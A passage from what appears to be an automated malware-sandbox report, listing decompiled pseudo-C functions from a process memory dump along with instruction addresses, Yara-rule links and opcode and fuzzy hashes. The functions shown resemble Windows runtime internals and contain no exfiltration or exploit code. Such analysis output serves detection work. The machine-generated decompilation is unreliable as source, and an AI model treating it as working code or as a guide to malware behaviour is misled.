                        Uniqueness Score: -1.00%

                        Function 02B746A7, Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E02B746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E02B3F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E02B2D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L02B177F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                        0x02b746b7
                        0x02b746ba
                        0x02b746c5
                        0x02b746c8
                        0x02b746d0
                        0x02b746d4
                        0x02b746e6
                        0x02b746e9
                        0x02b746f4
                        0x02b746ff
                        0x02b74705
                        0x02b74706
                        0x02b7470c
                        0x02b74713
                        0x02b7471b
                        0x02b74723
                        0x02b74725
                        0x02b746d6
                        0x02b746d9
                        0x02b746db
                        0x02b746db
                        0x02b74732

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 7b740599473fe5707e59a91a188bae729a95e4dbb8b7728ee7ff84d5b9456fa9
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: D011E572904208BFC7059F5CD8809BEB7BAEF99304F1080AEF984C7350DA318D55D7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFC962, Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 42%
                        			E02AFC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x2bed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E02B0EEF0(0x2be70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E02B7F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E02B0EB70(_t29, 0x2be70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E02B3B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E02B7F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x2be70c0; // 0x0
					while(_t38 != 0x2be70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x2beb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                        0x02afc96a
                        0x02afc974
                        0x02afc988
                        0x02afc98a
                        0x02b67c9d
                        0x02b67c9f
                        0x02b67ca4
                        0x02b67cae
                        0x02b67cf0
                        0x02b67cf5
                        0x02b67cfa
                        0x02afc992
                        0x02afc996
                        0x02afc997
                        0x02afc998
                        0x02afc9a3
                        0x02afc9a3
                        0x02b67cb0
                        0x02b67cb7
                        0x02b67cbb
                        0x00000000
                        0x00000000
                        0x02b67cbd
                        0x02b67ce8
                        0x02b67cc5
                        0x02b67cc8
                        0x02b67cca
                        0x02b67cd0
                        0x02b67cd6
                        0x02b67cde
                        0x02b67ce4
                        0x02b67ce4
                        0x02b67cd0
                        0x00000000
                        0x02b67ce8
                        0x02afc990
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7337b0f5bc684e9176d7e612098e03502ed6718350e7930051373e379e8bc436
                        • Instruction ID: c46ed0cab4d85fe1c2681479ff6cfb5c8f5dc113731f7e6917aab4dfc71a0aee
                        • Opcode Fuzzy Hash: 7337b0f5bc684e9176d7e612098e03502ed6718350e7930051373e379e8bc436
                        • Instruction Fuzzy Hash: F611E5317106069BDB10AF28DC89A3BF7E7FF84658B0009A9F94687651DF28ED50EBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B337F5, Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E02B337F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E02B12280(_t6, 0x2be8550);
				}
				_t29 = E02B3387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E02B0FFB0(0x2be8550, _t27, 0x2be8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                        0x02b337fa
                        0x02b337fc
                        0x02b33805
                        0x02b33808
                        0x02b33808
                        0x02b33814
                        0x02b33818
                        0x02b33846
                        0x02b33848
                        0x02b3384b
                        0x02b3384b
                        0x02b33852
                        0x00000000
                        0x02b33854
                        0x02b33856
                        0x00000000
                        0x00000000
                        0x02b33863
                        0x00000000
                        0x02b33863
                        0x02b3381a
                        0x02b3381a
                        0x02b3381f
                        0x02b3386e
                        0x02b3386e
                        0x02b33871
                        0x02b33873
                        0x02b33873
                        0x02b33868
                        0x00000000
                        0x02b33868
                        0x02b33821
                        0x02b33826
                        0x00000000
                        0x00000000
                        0x02b33828
                        0x02b3382a
                        0x02b33841
                        0x00000000
                        0x02b33841

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b9187929bbea023e2d790269ed7f92b18fea9c240c45f755f6c66fce36b4f20
                        • Instruction ID: da39309d5566df1de04d8244adc869802eac10d2b686f2fa5a8b71fa1fc56bec
                        • Opcode Fuzzy Hash: 9b9187929bbea023e2d790269ed7f92b18fea9c240c45f755f6c66fce36b4f20
                        • Instruction Fuzzy Hash: 5601B5B2A41610ABC3378B1AD940F2BBBE7DF85B60B1544EDE9498B311DB34E841CBD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2002D, Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B2002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E02B17D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E02B17D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E02B17D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E02B17D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                        0x02b20032
                        0x02b20037
                        0x02b20043
                        0x02b64b3a
                        0x02b20049
                        0x02b20049
                        0x02b20049
                        0x02b2004e
                        0x02b20053
                        0x02b64b48
                        0x02b64b5a
                        0x02b64b4a
                        0x02b64b53
                        0x02b64b53
                        0x02b64b5f
                        0x00000000
                        0x02b64b61
                        0x00000000
                        0x02b64b61
                        0x02b20059
                        0x02b20059
                        0x02b20060
                        0x02b64b6f
                        0x02b64b6f
                        0x02b20069
                        0x02b64b83
                        0x00000000
                        0x00000000
                        0x02b64b90
                        0x02b64b9b
                        0x02b64b9b
                        0x02b64ba4
                        0x00000000
                        0x00000000
                        0x02b64baa
                        0x00000000
                        0x02b2006f
                        0x02b2006f
                        0x00000000
                        0x02b2006f
                        0x02b20069

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction ID: 2c077b5592c960acfce24d8510e3ebc117e12d39618ee6f7ec189f6123ad4ff9
                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                        • Instruction Fuzzy Hash: 62112676601B968FE732AB28C948B367BF5EF41758F0D04E0DD0887692DB2CC841C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0766D, Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E02B0766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E02B2F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E02B2F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L02B14620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                        0x02b07672
                        0x02b0767f
                        0x02b07689
                        0x02b076de
                        0x02b076de
                        0x02b0768b
                        0x02b07691
                        0x02b07693
                        0x02b07697
                        0x00000000
                        0x02b07699
                        0x02b076a8
                        0x00000000
                        0x02b076aa
                        0x02b076ad
                        0x02b076b1
                        0x00000000
                        0x02b076b3
                        0x02b076b3
                        0x02b076b5
                        0x02b076ba
                        0x02b076bc
                        0x02b076bc
                        0x02b076c0
                        0x00000000
                        0x02b076c2
                        0x02b076ce
                        0x02b076ce
                        0x02b076c0
                        0x02b076b1
                        0x02b076a8
                        0x02b07697
                        0x02b076d9

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 46a965bcb2d63f411bc6bbf7fb71e61d3f2be0c6e191b94b6e898fdbbc62e132
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: CB018872700119ABC7219E9EDD81E5BFBADEB84764B1445A4B909CF290DE31ED01E7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF9080, Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E02AF9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x2be85ec;
				E02B12280(_t48, 0x2be85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E02B0FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x2be538c; // 0x77f06848
					if( *_t84 != 0x2be5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x2bcf6e8);
						E02B4D0E8(0x2be85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E02BC88F5(_t80, _t85, 0x2be5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x2be86c0; // 0x6007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x2be86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E02B12280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E02BC88F5(0x2be85ec, _t85, 0x2be5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E02B3AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x2beb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x2be84c0;
																			if(_t82 >=  *0x2be84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E02BC9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E02AF922A(_t99);
										_t64 = E02B17D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E02BC8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x2be86c0; // 0x6007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x2be86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x2be86bc;
													_t87 = 0x2be86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E02AF9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x2be86c4;
												_t87 = 0x2be86c0;
												L27:
												E02B29B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E02B4D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x2be5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x2be538c = _t51;
						goto L6;
					}
				}
			}




















                        0x02af9082
                        0x02af9083
                        0x02af9084
                        0x02af9085
                        0x02af9087
                        0x02af9096
                        0x02af9098
                        0x02af9098
                        0x02af909e
                        0x02af90a8
                        0x02af90e7
                        0x02af90e7
                        0x02af90aa
                        0x02af90b0
                        0x02af90b7
                        0x02af90bd
                        0x02af90dd
                        0x02af90e6
                        0x02af90bf
                        0x02af90bf
                        0x02af90c7
                        0x02af90cf
                        0x02af90f1
                        0x02af90f2
                        0x02af90f4
                        0x02af90f5
                        0x02af90f6
                        0x02af90f7
                        0x02af90f8
                        0x02af90f9
                        0x02af90fa
                        0x02af90fb
                        0x02af90fc
                        0x02af90fd
                        0x02af90fe
                        0x02af90ff
                        0x02af9100
                        0x02af9102
                        0x02af9107
                        0x02af910c
                        0x02af9110
                        0x02af9113
                        0x02af9115
                        0x02af9136
                        0x02af913f
                        0x02af9143
                        0x02b537e4
                        0x02b537e4
                        0x02af9117
                        0x02af9117
                        0x02af911d
                        0x00000000
                        0x02af911f
                        0x02af911f
                        0x02af9125
                        0x00000000
                        0x02af9127
                        0x02af912d
                        0x02af9130
                        0x02af9134
                        0x02af9158
                        0x02af915d
                        0x02af9161
                        0x02af9168
                        0x02b53715
                        0x02af916e
                        0x02af916e
                        0x02af9175
                        0x02af9177
                        0x02af917e
                        0x02af917f
                        0x02af9182
                        0x02af9182
                        0x02af9187
                        0x02af9187
                        0x02af918a
                        0x02af918d
                        0x02af918f
                        0x02af9192
                        0x02af9195
                        0x02af9198
                        0x02af9198
                        0x02af9198
                        0x02af919a
                        0x00000000
                        0x00000000
                        0x02b5371f
                        0x02b53721
                        0x02b53727
                        0x02b5372f
                        0x02b53733
                        0x02b53735
                        0x02b53738
                        0x02b5373b
                        0x02b5373d
                        0x02b53740
                        0x00000000
                        0x02b53746
                        0x02b53746
                        0x02b53749
                        0x00000000
                        0x02b5374f
                        0x02b5374f
                        0x02b53751
                        0x02b53757
                        0x02b53759
                        0x02b5375c
                        0x02b5375c
                        0x02b5375e
                        0x02b5375e
                        0x02b53761
                        0x02b53764
                        0x00000000
                        0x00000000
                        0x02b53766
                        0x02b53768
                        0x02b537a3
                        0x02b537a3
                        0x02b537a5
                        0x02b537a7
                        0x02b537ad
                        0x02b537b0
                        0x02b537b2
                        0x02b537bc
                        0x02b537c2
                        0x02b537c2
                        0x02b537b2
                        0x02af9187
                        0x02af9187
                        0x02af918a
                        0x02af918d
                        0x02af918f
                        0x02af9192
                        0x02af9195
                        0x00000000
                        0x02af9195
                        0x00000000
                        0x02b5376a
                        0x02b5376a
                        0x02b5376a
                        0x02b5376c
                        0x02b5376c
                        0x02b5376f
                        0x02b53775
                        0x00000000
                        0x00000000
                        0x02b53777
                        0x02b53779
                        0x02b53782
                        0x02b53787
                        0x02b53789
                        0x02b53790
                        0x02b53790
                        0x02b5378b
                        0x02b5378b
                        0x02b5378b
                        0x02b53792
                        0x02b53795
                        0x00000000
                        0x02b53795
                        0x00000000
                        0x02b53779
                        0x02b53798
                        0x00000000
                        0x02b53798
                        0x00000000
                        0x02b53768
                        0x02b5379b
                        0x02b5379b
                        0x02b53751
                        0x02b53749
                        0x00000000
                        0x02b53740
                        0x02af91a0
                        0x02af91a3
                        0x02af91a9
                        0x02af91b0
                        0x00000000
                        0x02af91b0
                        0x02af9187
                        0x02af91b4
                        0x02af91b4
                        0x02af91bb
                        0x02af91c0
                        0x02af91c5
                        0x02af91c7
                        0x02b537da
                        0x02af91cd
                        0x02af91cd
                        0x02af91cd
                        0x02af91d2
                        0x02af91d5
                        0x02af9239
                        0x02af9239
                        0x02af91d7
                        0x02af91db
                        0x02af91e1
                        0x02af91e7
                        0x02af91fd
                        0x02af9203
                        0x02af921e
                        0x02af9223
                        0x00000000
                        0x02af9205
                        0x02af9205
                        0x02af9208
                        0x02af920c
                        0x02af9214
                        0x02af9214
                        0x02af920c
                        0x02af91e9
                        0x02af91e9
                        0x02af91ee
                        0x02af91f3
                        0x02af91f3
                        0x02af91f3
                        0x02af91e7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02af9134
                        0x02af9125
                        0x02af911d
                        0x02af914e
                        0x02af90d1
                        0x02af90d1
                        0x02af90d3
                        0x02af90d6
                        0x02af90d8
                        0x00000000
                        0x02af90d8
                        0x02af90cf

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 303a3f8ca66cdfcbd7a3ebd7cd65bccbca437dd4151e171c241b1961c43afa4a
                        • Instruction ID: 639a246899ab0cbe6c39578bab393d6bc7f419984cfdc20a91397249baeae339
                        • Opcode Fuzzy Hash: 303a3f8ca66cdfcbd7a3ebd7cd65bccbca437dd4151e171c241b1961c43afa4a
                        • Instruction Fuzzy Hash: C801A472A01605CFC7659F54D880B17BBF9EB45324F258066E6068FB91CB78DC41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B8C450, Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E02B8C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E02B39910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E02B395B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E02B395D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E02B395D0();
				return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                        0x02b8c458
                        0x02b8c45d
                        0x02b8c466
                        0x02b8c468
                        0x02b8c469
                        0x02b8c46a
                        0x02b8c46b
                        0x02b8c46e
                        0x02b8c46f
                        0x02b8c471
                        0x02b8c476
                        0x02b8c476
                        0x02b8c47c
                        0x02b8c47e
                        0x02b8c480
                        0x02b8c480
                        0x02b8c483
                        0x02b8c484
                        0x02b8c486
                        0x02b8c488
                        0x02b8c48f
                        0x02b8c491
                        0x02b8c493
                        0x02b8c493
                        0x02b8c48f
                        0x02b8c498
                        0x02b8c49e
                        0x02b8c4ad
                        0x02b8c4ad
                        0x02b8c4b2
                        0x02b8c4b4
                        0x02b8c4cd

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: 6dba459b51ab925bea2aef627e562109b0d7a67dea04117733f3517eb69f758f
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: 3E0192B2140A05BFD726AF65CC80E62FB6EFF54794F554565F21443560CB61ACE0CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC4015, Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E02BC4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E02B12280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
